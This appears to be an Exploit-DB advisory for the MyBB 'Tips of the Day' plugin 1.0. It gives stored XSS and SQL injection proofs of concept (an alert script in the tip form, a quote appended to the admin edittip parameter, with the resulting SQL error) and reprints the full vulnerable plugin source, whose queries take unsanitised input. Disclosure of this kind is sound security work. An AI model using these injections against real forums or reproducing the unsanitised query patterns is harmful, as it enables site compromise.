扫码分享
验证:
体验盒子# Exploit Title: TipsOfTheDay mybb plugin stored XSS and SQL injection vulnerabilitys.
# Date: 12.12.2012
# Exploit Author: VipVince
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://mods.mybb.com/view/tips-of-the-day
# Version: 1.0
# Tested on: Windows
The tipsoftheday.php file is vulnerable to two common web vulnerability's. I will demonstrate below:
**********************************Stored XSS.**********************************************
The vulnerability lies here.
<?php
$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']);
?>
And can be exploited here.
http://www.server.com/dir/misc.php?tips=newtip
Add <script>alert(/xss/)</script> into the boxes as newtip and then refresh the page. Bingo our stored XSS pop up.
**************************************** SQLi Vuln ***************************************************
<?php
$query = $db->simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);
?>
As you can see has not been sanitized.
It can be exploited via admin panel. POC below:
http://www.server.com/bladir/admin/index.php?module=config-tipsoftheday&action=edittip&tip=[VAILD_ID]'[SQLi]
Result.
[quote]
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Query:
SELECT * FROM mybb_tipsoftheday WHERE totdid=1'
[/quote]
Brought to you by VipVince. Enjoy the 12/12/2012 "it only comes once" and all that bullshit.
<?php
if(!defined("IN_MYBB"))
{
die("Direct initialization of this file is not allowed.<br /><br />Please make sure IN_MYBB is defined.");
}
$plugins->add_hook("admin_config_menu", "tipsoftheday_admin_nav");
$plugins->add_hook("admin_config_action_handler", "tipsoftheday_action_handler");
$plugins->add_hook("admin_load", "tipsoftheday_admin");
$plugins->add_hook("index_start", "tipsoftheday_index");
$plugins->add_hook("misc_start", "tipsusers");
function tipsoftheday_info()
{
global $lang;
$lang->load("config_tipsoftheday", false, true);
return array(
"name" => $lang->name,
"description" => $lang->descriptionplugin,
"website" => "http://mybb-es.com",
"author" => "Edson Ordaz",
"authorsite" => "http://mybb-es.com",
"version" => "1.0",
"guid" => "f52d89922b319c5256b23cd1b3f09eb1",
"compatibility" => "*"
);
}
function tipsoftheday_activate()
{
global $db,$lang,$message;
$message .= $lang->activatemessage;
$lang->load("config_tipsoftheday", false, true);
if(!$db->table_exists("tipsoftheday") && !$db->table_exists("tipsoftheday_users"))
{
$db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday` (
`totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`uid` int(10) NOT NULL,
`tiptle` text NOT NULL DEFAULT '',
`tip` text NOT NULL DEFAULT '',
PRIMARY KEY (`totdid`)
) ENGINE=MyISAMDEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
$db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday_users` (
`totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`uid` int(10) NOT NULL,
`tiptle` text NOT NULL DEFAULT '',
`tip` text NOT NULL DEFAULT '',
PRIMARY KEY (`totdid`)
) ENGINE=MyISAMDEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
}
$tipsoftheday = array(
"tid" => "NULL",
"title" => 'tipsoftheday',
"template" => $db->escape_string('<style>
.tipoftheday{
display: block;
top:10px;
left:10px;
width:90%;
border:3px solid #FFD324;
background:#FFF6BF top left no-repeat;
padding:8px 8px 8px;
font-size:11px;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
border-radius: 10px;
-moz-box-shadow: 0px 0px 10px #777777;
-webkit-box-shadow: 0px 0px 10px #777777;
box-shadow: 0px 0px 10px #777777;
}
</style>
<span class="tipoftheday">
<strong>{$tip[\'tiptle\']}</strong><br />
{$tip[\'tip\']}
</span>
<br />'),
"sid" => "-1",
);
$tipsoftheday_newtip = array(
"tid" => "NULL",
"title" => 'tipsoftheday_newtip',
"template" => $db->escape_string('<html>
<head>
<title>{$lang->newtiptab}</title>
{$headerinclude}
</head>
<body>
{$header}
<form action="misc.php?tips=do_newtip" method="post" enctype="multipart/form-data" name="input">
<input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
<table border="0" cellspacing="{$theme[\'borderwidth\']}" cellpadding="{$theme[\'tablespace\']}" class="tborder">
<tr>
<td class="thead" colspan="2"><strong>{$lang->newtiptab}</strong></td>
</tr>
<tr>
<td class="trow2" width="15%"><strong>{$lang->newtipsubject}</strong></td>
<td class="trow2"><input type="text" class="textbox" name="tiptle" size="60" maxlength="85" value="{$tiptle}" tabindex="1" /></td>
</tr>
<tr>
<td class="trow2" valign="top"><strong>{$lang->newtipbody}</strong></td>
<td class="trow2">
<textarea name="tip" rows="5" cols="70" tabindex="2">{$tip}</textarea>
</td>
</tr>
</table>
<br /><div style="text-align:center">
<input type="submit" class="button" name="submit" value="{$lang->sendtipadmins}" tabindex="4" accesskey="s" />
<br /></div>
</form>
{$footer}
</body>
</html>'),
"sid" => "-1",
);
$db->insert_query("templates", $tipsoftheday);
$db->insert_query("templates", $tipsoftheday_newtip);
require_once MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets('index', '#{\$header}#', '{\$header}{$tips}');
$updatetips = array(
'uid' => 1,
'tiptle' => $db->escape_string($lang->templatitle),
'tip' => $db->escape_string($lang->templatbody)
);
$db->insert_query("tipsoftheday", $updatetips);
}
function tipsoftheday_deactivate()
{
global $db;
$db->drop_table("tipsoftheday");
$db->drop_table("tipsoftheday_users");
$db->delete_query("templates","title = 'tipsoftheday'");
$db->delete_query("templates","title = 'tipsoftheday_newtip'");
require MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets("index", '#{\$tips}#ism', "");
}
class Tips_Send_User {
/*
* Static tips
*
*/
private static $tips;
/*
* Class tips
*
*/
public static function Tips()
{
if(!is_object($tips))
{
$tips = new self;
}
return $tips;
}
/*
* Verificar titulo
* Tip enviado por miembro del foro
*
*/
public function verify_title($title)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($title)) > 5)
{
return true;
}
else
{
error($lang->tiptleminchars,$lang->name);
}
}
/*
*Verificar cuerpo del tip
* Enviado por usuario del foro
* Esperando aprobacion
*
*/
public function verify_tip($tip)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($tip)) > 15)
{
return true;
}
else
{
error($lang->tipbodyminchars,$lang->name);
}
}
/*
* Subir tip a tabla de tips
* Esperando aprobacion
*
* Si se aprueba se muestra
*
*/
public function update_new_tip($title,$tip,$uid)
{
global $db,$lang;
$updatetips = array(
'uid' => $uid,
'tiptle' => $db->escape_string($title),
'tip' => $db->escape_string($tip)
);
$totdid = $db->insert_query("tipsoftheday_users", $updatetips);
redirect("index.php",$lang->sendpet);
}
/*
* Tips
* Pagina de usuarios
* Pagina para el foro donde
* Los usuarios envian tips al staff
* Desde ACP son moderados
* Para ser mostrados o no
*
*/
public function Tips_Users()
{
global $db,$mybb,$templates,$theme;
global $header,$headerinclude,$footer,$lang;
$lang->load("admin/config_tipsoftheday", false, true);
if($mybb->input['tips'] != "newtip" && $mybb->input['tips'] != "do_newtip")
{
return;
}
if($mybb->input['tips'] == "do_newtip" && $mybb->request_method == "post")
{
verify_post_check($mybb->input['my_post_key']);
$this->verify_title($mybb->input['tiptle']);
$this->verify_tip($mybb->input['tip']);
$this->update_new_tip($mybb->input['tiptle'],$mybb->input['tip'],$mybb->user['uid']);
}
if($mybb->user['uid'] == 0)
{
error_no_permission();
}
add_breadcrumb($lang->addcreateheader);
eval("\$newtip = \"".$templates->get("tipsoftheday_newtip")."\";");
output_page($newtip);
}
}
class tipsadmin
{
/*
* Admin Tip
* TipsAdmin
*
*/
private static $admintip;
/*
* Returns class
*
*/
public static function TipsAdmin()
{
if(!is_object($admintip))
{
$admintip = new self;
}
return $admintip;
}
/*
* Construct class
*
*/
public function __construct()
{
$this->tipsoftheday = new tipsoftheday();
}
/*
* Nav admin
*
*/
public function AdminNav(&$nav)
{
global $mybb,$lang;
$lang->load("config_tipsoftheday", false, true);
end($nav);
$key = (key($nav))+10;
if(!$key)
{
$key = '110';
}
$nav[$key] = array('id' => "tipsoftheday", 'title' => $lang->name, 'link' => "index.php?module=config-tipsoftheday");
}
/*
* Admin Load
*
*/
public function AdminTips()
{
global $mybb, $db, $page, $cache, $lang;
if($page->active_action != "tipsoftheday")
{
return;
}
$page->add_breadcrumb_item($lang->name);
$page->output_header($lang->name);
$this->action_save($mybb->input['tiptle'],$mybb->input['tip'],$mybb->user['uid']);
$this->newtip();
$this->deletetip();
$this->edittip();
$this->requests();
$this->approve();
$this->reject();
$this->edittemplate();
$this->templatenewtip();
$this->savetemplate();
$this->savetemplatenews();
$this->saveedit();
$this->tabs("tips");
$this->tabletips($mybb->post_code);
$page->output_footer();
}
/*
* Guarda el tip del dia
* Envia funcion
*
*/
public function action_save($tiptle,$tip,$uid)
{
global $mybb;
if($mybb->input['action'] == "save")
{
$this->tipsoftheday->Save_Tip($tiptle,$tip,$uid);
}
}
/*
* Pestañas de Configuracion
*
*/
public function tabs($location)
{
global $page,$lang,$mybb;
$lang->requeststabdes = $lang->sprintf($lang->requeststabdes, $mybb->settings['bburl']."/misc.php?tips=newtip");
$tabs["tips"] = array(
'title' => $lang->name,
'link' => "index.php?module=config-tipsoftheday",
'description' => $lang->tipsdestabs
);
$tabs["newtip"] = array(
'title' => $lang->newtiptab,
'link' => "index.php?module=config-tipsoftheday&action=newtip",
'description' => $lang->newtiptabdes
);
$tabs["requests"] = array(
'title' => $lang->requeststab,
'link' => "index.php?module=config-tipsoftheday&action=requests",
'description' => $lang->requeststabdes
);
if($location == "template" || $location == "usertips")
{
$lang->templatetab = $lang->nametabindex;
}
$tabs["template"] = array(
'title' => $lang->templatetab,
'link' => "index.php?module=config-tipsoftheday&action=template",
'description' => $lang->templatetabdes
);
if($location == "template" || $location == "usertips")
{
$tabs["usertips"] = array(
'title' => $lang->usertipstab,
'link' => "index.php?module=config-tipsoftheday&action=templatenewtip",
'description' => $lang->usertipstabdes
);
}
$page->output_nav_tabs($tabs,$location);
}
/*
* Guardar plantilla
* Envia informacion
* al siguiente class
*
*/
public function savetemplate()
{
global $mybb,$db,$lang;
if($mybb->input['action'] == "savetemplate")
{
if($mybb->input['continue'])
{
$this->tipsoftheday->savetemplate($mybb->input['template'],$mybb->user['uid']);
}
if($mybb->input['revert'])
{
$template = array(
"template" => '<style>
.tipoftheday{
display: block;
top:10px;
left:10px;
width:90%;
border:3px solid #FFD324;
background:#FFF6BF top left no-repeat;
padding:8px 8px 8px;
font-size:11px;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
border-radius: 10px;
-moz-box-shadow: 0px 0px 10px #777777;
-webkit-box-shadow: 0px 0px 10px #777777;
box-shadow: 0px 0px 10px #777777;
}
</style>
<span class="tipoftheday">
<strong>{$tip[\\\'tiptle\\\']}</strong><br />
{$tip[\\\'tip\\\']}
</span>
<br />',
);
$db->update_query("templates", $template,"title='tipsoftheday'");
$this->tipsoftheday->fmessage($lang->templatesave,"success","&action=template");
}
}
}
/*
* Guardar plantilla
* Peticiones
*
*/
public function savetemplatenews()
{
global $mybb,$db,$lang;
if($mybb->input['action'] == "savetemplatenews")
{
if($mybb->input['continue'])
{
$this->tipsoftheday->savetemplatenews($mybb->input['template'],$mybb->user['uid']);
}
if($mybb->input['revert'])
{
$template = array(
"template" => '<html>
<head>
<title>{$lang->newtiptab}</title>
{$headerinclude}
</head>
<body>
{$header}
<form action="misc.php?tips=do_newtip" method="post" enctype="multipart/form-data" name="input">
<input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
<table border="0" cellspacing="{$theme[\\\'borderwidth\\\']}" cellpadding="{$theme[\\\'tablespace\\\']}" class="tborder">
<tr>
<td class="thead" colspan="2"><strong>{$lang->newtiptab}</strong></td>
</tr>
<tr>
<td class="trow2" width="15%"><strong>{$lang->newtipsubject}</strong></td>
<td class="trow2"><input type="text" class="textbox" name="tiptle" size="60" maxlength="85" value="{$tiptle}" tabindex="1" /></td>
</tr>
<tr>
<td class="trow2" valign="top"><strong>{$lang->newtipbody}</strong></td>
<td class="trow2">
<textarea name="tip" rows="5" cols="70" tabindex="2">{$tip}</textarea>
</td>
</tr>
</table>
<br /><div style="text-align:center">
<input type="submit" class="button" name="submit" value="{$lang->sendtipadmins}" tabindex="4" accesskey="s" />
<br /></div>
</form>
{$footer}
</body>
</html>',
);
$db->update_query("templates", $template,"title='tipsoftheday_newtip'");
$this->tipsoftheday->fmessage($lang->templatesave,"success","&action=templatenewtip");
}
}
}
/*
* Tabla de Tips
*
*/
function tabletips($mpcode)
{
global $db,$lang,$mybb;
$query = $db->simple_select('tipsoftheday', 'COUNT(totdid) AS tips', '', array('limit' => 1));
$quantity = $db->fetch_field($query, "tips");
$pagina = intval($mybb->input['page']);
$perpage = 15;
if($pagina > 0)
{
$start = ($pagina - 1) * $perpage;
$pages = $quantity / $perpage;
$pages = ceil($pages);
if($pagina > $pages || $pagina <= 0)
{
$start = 0;
$pagina = 1;
}
}
else
{
$start = 0;
$pagina = 1;
}
$pageurl = "index.php?module=config-tipsoftheday";
$table = new Table;
$table->construct_header($lang->user, array("width" => "10%"));
$table->construct_header($lang->title, array("width" => "10%"));
$table->construct_header($lang->tip, array("width" => "70%"));
$table->construct_header($lang->edit, array("width" => "5%"));
$table->construct_header($lang->delete, array("width" => "5%"));
$table->construct_row();
$query = $db->query('SELECT * FROM '.TABLE_PREFIX.'tipsoftheday ORDER BY totdid DESC LIMIT '.$start.', '.$perpage);
while($tip = $db->fetch_array($query))
{
$lang->deletetippopup = $lang->sprintf($lang->deletetippopup, $tip['tiptle']);
$table->construct_cell($this->tipsoftheday->username($tip[uid]));;
$table->construct_cell($tip[tiptle]);
$table->construct_cell($tip[tip]);
$table->construct_cell("<a href=\"index.php?module=config-tipsoftheday&action=edittip&tip={$tip['totdid']}\" ><img src=\"styles/default/images/icons/custom.gif\" /></a>",array("class" => "align_center"));
$table->construct_cell("<a href=\"index.php?module=config-tipsoftheday&action=deletetip&tip={$tip['totdid']}&my_post_key={$mpcode}\" onclick=\"return AdminCP.deleteConfirmation(this, '{$lang->deletetippopup}')\"><img src=\"styles/default/images/icons/delete.gif\" /> </a>",array("class" => "align_center"));
$table->construct_row();
}
$table->output($lang->name);
echo multipage($quantity, (int)$perpage, (int)$pagina, $pageurl);
}
/*
* Tabla de peticiones
*
*/
public function requests()
{
global $db,$lang,$page,$mybb;
if($mybb->input['action'] == "requests")
{
$this->tabs("requests");
$query = $db->simple_select('tipsoftheday_users', 'COUNT(totdid) AS tips', '', array('limit' => 1));
$quantity = $db->fetch_field($query, "tips");
$pagina = intval($mybb->input['page']);
$perpage = 15;
if($pagina > 0)
{
$start = ($pagina - 1) * $perpage;
$pages = $quantity / $perpage;
$pages = ceil($pages);
if($pagina > $pages || $pagina <= 0)
{
$start = 0;
$pagina = 1;
}
}
else
{
$start = 0;
$pagina = 1;
}
$pageurl = "index.php?module=config-tipsoftheday&action=requests";
$table = new Table;
$table->construct_header($lang->user, array("width" => "10%"));
$table->construct_header($lang->title, array("width" => "10%"));
$table->construct_header($lang->tip, array("width" => "70%"));
$table->construct_header($lang->options, array("width" => "10%"));
$table->construct_row();
$query = $db->query('SELECT * FROM '.TABLE_PREFIX.'tipsoftheday_users ORDER BY totdid DESC LIMIT '.$start.', '.$perpage);
while($tip = $db->fetch_array($query))
{
$lang->deletetippopup = $lang->sprintf($lang->deletetippopup, $tip['tiptle']);
$table->construct_cell($this->tipsoftheday->username($tip[uid]));;
$table->construct_cell($tip[tiptle]);
$table->construct_cell($tip[tip]);
$popup = new PopupMenu("tip_{$tip['totdid']}", $lang->options);
$popup->add_item($lang->aprobe, "index.php?module=config-tipsoftheday&approve={$tip['totdid']}");
$popup->add_item($lang->reject, "index.php?module=config-tipsoftheday&reject={$tip['totdid']}");
$Popuss = $popup->fetch();
$table->construct_cell($Popuss, array('class' => 'align_center'));
$table->construct_row();
}
$table->output($lang->name);
echo multipage($quantity, (int)$perpage, (int)$pagina, $pageurl);
$page->output_footer();
}
}
/*
* Aprobar
* Peticion
*
*/
public function approve()
{
global $mybb,$db,$lang;
if($mybb->input['approve'])
{
$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']);
$tip = $db->fetch_array($query);
$title = $tip[tiptle];
$tipbody = $tip[tip];
$user = $tip[uid];
$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday_users WHERE totdid='".intval($mybb->input['approve'])."'");
$this->tipsoftheday->Save_Tip($title,$tipbody,$user);
}
}
/*
* Rechazar el tip
*
*/
public function reject()
{
global $mybb,$lang,$db;
if($mybb->input['reject'])
{
$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['reject']);
$tip = $db->fetch_array($query);
if(!$tip['totdid'])
{
$this->tipsoftheday->fmessage($lang->tipnotexists,"error","");
}
$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday_users WHERE totdid='".intval($mybb->input['reject'])."'");
$this->tipsoftheday->fmessage($lang->deletetipsuccess,"success","&action=requests");
}
}
/*
* Nuevo Tip
* Formulario
*
*/
public function newtip()
{
global $mybb,$page,$lang;
if($mybb->input['action'] == "newtip")
{
$this->tabs("newtip");
$form = new Form("index.php?module=config-tipsoftheday&action=save", "post");
$form_container = new FormContainer($lang->newtiptab);
$form_container->output_row($lang->newtipsubject, $lang->newtipsubjectdes, $form->generate_text_box('tiptle', "", array('id' => 'tiptle')), 'tiptle');
$form_container->output_row($lang->newtipbody, $lang->newtipbodydes, $form->generate_text_area('tip', "", array('id' => 'tip')), 'tip');
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->savetip);
$form->output_submit_wrapper($buttons);
$form->end();
$page->output_footer();
}
}
/*
* Eliminacion de Tip
* Recibe totdid
*
*/
public function deletetip()
{
global $db,$mybb,$page,$lang;
if($mybb->input['action'] == "deletetip")
{
$query = $db->simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);
if(!$tip['totdid'])
{
$this->tipsoftheday->fmessage($lang->tipnotexists,"error","");
}
if($mybb->input['no'])
{
admin_redirect("index.php?module=config-tipsoftheday");
}
if($mybb->request_method == "post")
{
$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday WHERE totdid='".intval($mybb->input['tip'])."'");
$this->tipsoftheday->fmessage($lang->deletetipsuccess,"success","");
}
else
{
$page->output_confirm_action("index.php?module=config-tipsoftheday");
}
}
}
/*
* Editar Tip
*
*/
public function edittip()
{
global $mybb,$db,$page,$lang;
if($mybb->input['action'] == "edittip")
{
$this->tipsoftheday->verify_totdid($mybb->input['tip']);
$this->tabs("tips");
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."tipsoftheday WHERE totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);
$form = new Form("index.php?module=config-tipsoftheday&action=saveedit", "post");
echo $form->generate_hidden_field("totdid", $tip[totdid]);
echo $form->generate_hidden_field("autor", $tip[uid]);
$form_container = new FormContainer($tip[tiptle]);
$form_container->output_row($lang->newtipsubject, $lang->newtipsubjectdes, $form->generate_text_box('tiptle',$tip[tiptle], array('id' => 'tiptle')), 'tiptle');
$form_container->output_row($lang->newtipbody, $lang->newtipbodydes, $form->generate_text_area('tip',$tip[tip], array('id' => 'tip')), 'tip');
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->saveedittip);
$form->output_submit_wrapper($buttons);
$form->end();
$page->output_footer();
}
}
/*
* Guardar edicion
*
*/
public function saveedit()
{
global $mybb;
if($mybb->input['action'] == "saveedit")
{
$this->tipsoftheday->Save_Edit_Tip($mybb->input['totdid'],$mybb->input['tiptle'],$mybb->input['tip'],$mybb->input['autor']);
}
}
/*
* Editar Plantilla
*
*/
public function edittemplate()
{
global $mybb,$db,$page,$lang;
if($mybb->input['action'] == "template")
{
$this->tabs("template");
$queryadmin=$db->simple_select('adminoptions','*','uid='.$mybb->user['uid']);
$admin_options=$db->fetch_array($queryadmin);
if($admin_options['codepress']!=0)
{
$page->extra_header='<link type="text/css" href="https://www.exploit-db.com/exploits/23322/jscripts/codepress/languages/codepress-mybb.css" rel="stylesheet" id="cp-lang-style" />
<script type="text/javascript" src="https://www.exploit-db.com/exploits/23322/jscripts/codepress/codepress.js"></script>
<script type="text/javascript">
CodePress.language=\'mybb\';
</script>';
}
$query = $db->write_query("SELECT template FROM ".TABLE_PREFIX."templates WHERE title='tipsoftheday'");
$template = $db->fetch_array($query);
$form = new Form("index.php?module=config-tipsoftheday&action=savetemplate", "post");
$form_container = new FormContainer("Editar Plantilla: ".$lang->name);
$form_container->output_row($lang->edittemplatename."<em>*</em>",$lang->edittemplatenamedes, "<input type=\"text\" class=\"text_input\" value=\"tipsoftheday\" readonly=\"readonly\">");
$form_container->output_row($lang->edittemplateset."<em>*</em>",$lang->edittemplatesetdes, "<select><option>{$lang->name}</option></select>");
$form_container->output_row("","", $form->generate_text_area('template',$template['template'],array('id'=>'template','class'=>'codepress mybb','style'=>'width:100%;height:500px;')));
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->savetemplate, array('name' => 'continue'));
$buttons[] = $form->generate_submit_button($lang->backoriginal, array('name' => 'revert', 'onclick' => 'return confirm(\''.$lang->revertoriginalquestion.'\');'));
$form->output_submit_wrapper($buttons);
$form->end();
if($admin_options['codepress']!=0)
{
echo '<script type="text/javascript">
Event.observe(\'add_template\',\'submit\',function()
{
if($(\'template_cp\'))
{
var area=$(\'template_cp\');
area.id=\'template\';
area.value=template.getCode();
area.disabled=false;
}
});
</script>';
}
$page->output_footer();
}
}
/*
* Editar plantilla
* peticiones de tips
*
*/
public function templatenewtip()
{
global $mybb,$db,$page,$lang;
if($mybb->input['action'] == "templatenewtip")
{
$this->tabs("usertips");
$queryadmin=$db->simple_select('adminoptions','*','uid='.$mybb->user['uid']);
$admin_options=$db->fetch_array($queryadmin);
if($admin_options['codepress']!=0)
{
$page->extra_header='<link type="text/css" href="https://www.exploit-db.com/exploits/23322/jscripts/codepress/languages/codepress-mybb.css" rel="stylesheet" id="cp-lang-style" />
<script type="text/javascript" src="https://www.exploit-db.com/exploits/23322/jscripts/codepress/codepress.js"></script>
<script type="text/javascript">
CodePress.language=\'mybb\';
</script>';
}
$query = $db->write_query("SELECT template FROM ".TABLE_PREFIX."templates WHERE title='tipsoftheday_newtip'");
$template = $db->fetch_array($query);
$form = new Form("index.php?module=config-tipsoftheday&action=savetemplatenews", "post");
$form_container = new FormContainer("Editar Plantilla: ".$lang->name);
$form_container->output_row($lang->edittemplatename."<em>*</em>",$lang->edittemplatenamedes, "<input type=\"text\" class=\"text_input\" value=\"tipsoftheday_newtip\" readonly=\"readonly\">");
$form_container->output_row($lang->edittemplateset."<em>*</em>",$lang->edittemplatesetdes, "<select><option>{$lang->name}</option></select>");
$form_container->output_row("","", $form->generate_text_area('template',$template['template'],array('id'=>'template','class'=>'codepress mybb','style'=>'width:100%;height:500px;')));
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->savetemplate, array('name' => 'continue'));
$buttons[] = $form->generate_submit_button($lang->backoriginal, array('name' => 'revert', 'onclick' => 'return confirm(\''.$lang->revertoriginalquestion.'\');'));
$form->output_submit_wrapper($buttons);
$form->end();
if($admin_options['codepress']!=0)
{
echo '<script type="text/javascript">
Event.observe(\'add_template\',\'submit\',function()
{
if($(\'template_cp\'))
{
var area=$(\'template_cp\');
area.id=\'template\';
area.value=template.getCode();
area.disabled=false;
}
});
</script>';
}
$page->output_footer();
}
}
}
class tipsoftheday {
/**
* Tips
*
*/
private static $tips;
/*
* Static class
*
*/
public static function Tips()
{
if(!is_object($tips))
{
$tips = new self;
}
return $tips;
}
/*
* Guarda el tip del dia
*
*/
public function Save_Tip($subject,$body,$user)
{
global $db,$lang;
$this->verify_tiptle($subject);
$this->verify_tip($body);
$updatetips = array(
'uid' => (int)($user),
'tiptle' => $db->escape_string($subject),
'tip' => $db->escape_string($body)
);
$totdid = $db->insert_query("tipsoftheday", $updatetips);
$this->fmessage($lang->savetipsuccess,"success","");
}
/*
* Error de caracteres minimos
* Titulo y Mensaje
*
*/
public function fmessage($langerror,$type,$url)
{
flash_message($langerror, $type);
admin_redirect("index.php?module=config-tipsoftheday".$url);
}
/*
* Verifica el mensaje del tip
* Verificar si existen los caracteres correctos
* Verificar que el mensaje no este vacio
*
*/
public function verify_tip($tip)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($tip)) == 0)
{
$this->fmessage($lang->tipbodyempty,"error","&action=newtip");
}
else if(strlen($tip) < 10)
{
$this->fmessage($lang->tipbodyminchars,"error","&action=newtip");
}
else if(my_strlen($tip) < 10)
{
$this->fmessage($lang->tipbodyminchars,"error","&action=newtip");
}
return true;
}
/*
* Verifica si existe usuario
*
*/
public function verify_user($uid)
{
global $db,$lang;
$query = $db->simple_select("users", "COUNT(*) as user", "uid='".intval($uid)."'", array('limit' => 1));
if($db->fetch_field($query, 'user') == 1)
{
return true;
}
else
{
$this->fmessage($lang->usernotexists,"error","");
}
}
/*
* Verifica que exista el Tip
*
*/
public function verify_totdid($id)
{
global $db,$lang;
$query = $db->simple_select("tipsoftheday", "COUNT(*) as tip", "totdid='".intval($id)."'", array('limit' => 1));
if($db->fetch_field($query, 'tip') == 1)
{
return true;
}
else
{
$this->fmessage($lang->tipnotexistserror,"error","");
}
}
/*
* Verficar que el titulo
* del tip no este vacio
*
* Solo necesita 3 caracteres para poder enviarse
*
*/
public function verify_tiptle($tip)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($tip)) > 3)
{
return true;
}
else
{
$this->fmessage($lang->tiptleminchars,"error","&action=newtip");
}
}
/*
* Verificar la plantilla
* Verificar que no se encuentre vacia
*
*/
public function verify_template($template,$url)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($template)) != 0)
{
return true;
}
else
{
$this->fmessage($lang->templateminchars,"error",$url);
}
}
/*
* Formato de Nombre
* Nombre con Color
* Color del grupo Obtenido
*
*/
public function username($uid)
{
global $db,$cache,$groupscache;
$query_users = $db->simple_select("users", "*", "uid=".$uid);
while($user = $db->fetch_array($query_users))
{
$groupscache = $cache->read("usergroups");
$ugroup = $groupscache[$user['usergroup']];
$format = $ugroup['namestyle'];
$userin = substr_count($format, "{username}");
if($userin == 0)
{
$format = "{username}";
}
$format = stripslashes($format);
$username = str_replace("{username}", $user['username'], $format);
}
return $username;
}
/*
* Guardar Plantilla
*
*/
public function savetemplate($template,$uid)
{
global $mybb,$db,$lang;
$this->verify_user($uid);
$this->verify_template($template);
$template = array(
"template" => $db->escape_string($template)
);
$db->update_query("templates", $template,"title='tipsoftheday'");
$this->fmessage($lang->templatesave,"success","&action=template");
}
/*
* Guarda la plantilla
* Petiiones
*
*/
public function savetemplatenews($template,$uid)
{
global $mybb,$db,$lang;
$this->verify_user($uid);
$this->verify_template($template,"&action=templatenewtip");
$template = array(
"template" => $db->escape_string($template)
);
$db->update_query("templates", $template,"title='tipsoftheday_newtip'");
$this->fmessage($lang->templatesave,"success","&action=templatenewtip");
}
/*
* Guarda edicion de Tip
*
*/
public function Save_Edit_Tip($id,$subject,$body,$uid)
{
global $db,$lang;
$this->verify_tiptle($subject);
$this->verify_tip($body);
$this->verify_user($uid);
$this->verify_totdid($id);
$editupdate = array(
'uid' => (int)($uid),
'tiptle' => $db->escape_string($subject),
'tip' => $db->escape_string($body)
);
$db->update_query("tipsoftheday", $editupdate,"totdid=".$id);
$this->fmessage($lang->editsuccesssave,"success","");
}
/*
* Funcion para mostrar Tip
*
*/
public function Index_tips()
{
global $mybb,$tips,$db,$templates;
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."tipsoftheday ORDER BY RAND() LIMIT 1;");
$tip = $db->fetch_array($query);
eval("\$tips = \"".$templates->get("tipsoftheday")."\";");
}
}
function tipsoftheday_action_handler(&$action)
{
$action['tipsoftheday'] = array('active' => 'tipsoftheday', 'file' => '');
}
function tipsoftheday_admin_nav(&$sub_menu)
{
tipsadmin::TipsAdmin()->AdminNav(&$sub_menu);
}
function tipsoftheday_admin()
{
tipsadmin::TipsAdmin()->AdminTips();
}
function tipsoftheday_index()
{
tipsoftheday::Tips()->Index_tips();
}
function tipsusers()
{
Tips_Send_User::Tips()->Tips_Users();
}
?>
体验盒子
